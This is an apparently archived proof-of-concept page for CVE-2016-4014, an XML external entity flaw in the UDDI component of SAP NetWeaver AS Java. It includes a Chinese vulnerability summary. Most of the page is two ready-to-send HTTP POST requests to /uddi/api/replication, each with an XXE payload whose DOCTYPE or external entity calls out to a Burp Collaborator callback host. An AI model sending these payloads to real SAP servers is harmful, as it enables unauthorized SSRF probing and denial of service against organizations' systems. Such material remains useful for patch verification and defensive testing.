Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2016-4014 PoC — SAP NetWeaver AS JAVA UDDI组件XML外部实体漏洞

Source
https://github.com/murataydemir/CVE-2016-4014
Associated Vulnerability
Title:SAP NetWeaver AS JAVA UDDI组件XML外部实体漏洞 (CVE-2016-4014)
Description:SAP NetWeaver是德国思爱普(SAP)公司的一套面向服务的集成化应用平台,该平台可为SAP应用提供开发和运行环境。SAP NetWeaver AS(Application Server)Java是一款运行于NetWeaver中且基于Java编程语言的应用服务器。UDDI是其中的一个对Web services进行注册和搜索的目录服务组件。 SAP NetWeaver AS JAVA 7.4版本的UDDI组件中存在XML外部实体漏洞。远程攻击者可通过发送特制的XML请求利用该漏洞造成拒绝服务。
Description
[CVE-2016-4014] SAP Netweaver AS JAVA UDDI Component XML External Entity (XXE)
Readme
<b>[CVE-2016-4014] SAP Netweaver JAVA AS UDDI Component XXE</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
```
POST /uddi/api/replication HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://xyzabcdefhjkl.burpcollaborator.net/ssrf">
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Header />
    <SOAP-ENV:Body>
        <do_ping>
            <authInfo />
            <findQualifiers>
                <findQualifier>FINDQUALIFIER</findQualifier>
            </findQualifiers>
            <tModelBag>
                <tModelKey>asd</tModelKey>
            </tModelBag>
        </do_ping>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```

```
POST /uddi/api/replication HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://xyzabcdefhjkl.burpcollaborator.net/">
%external;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Header />
    <SOAP-ENV:Body>
        <do_ping>
            <authInfo />
            <findQualifiers>
                <findQualifier>FINDQUALIFIER</findQualifier>
            </findQualifiers>
            <tModelBag>
                <tModelKey>asd</tModelKey>
            </tModelBag>
        </do_ping>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
File Snapshot

 [4.0K]  /data/pocs/a93785df4caa239ffc47e0dac17b4f584f00e424
└── [1.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.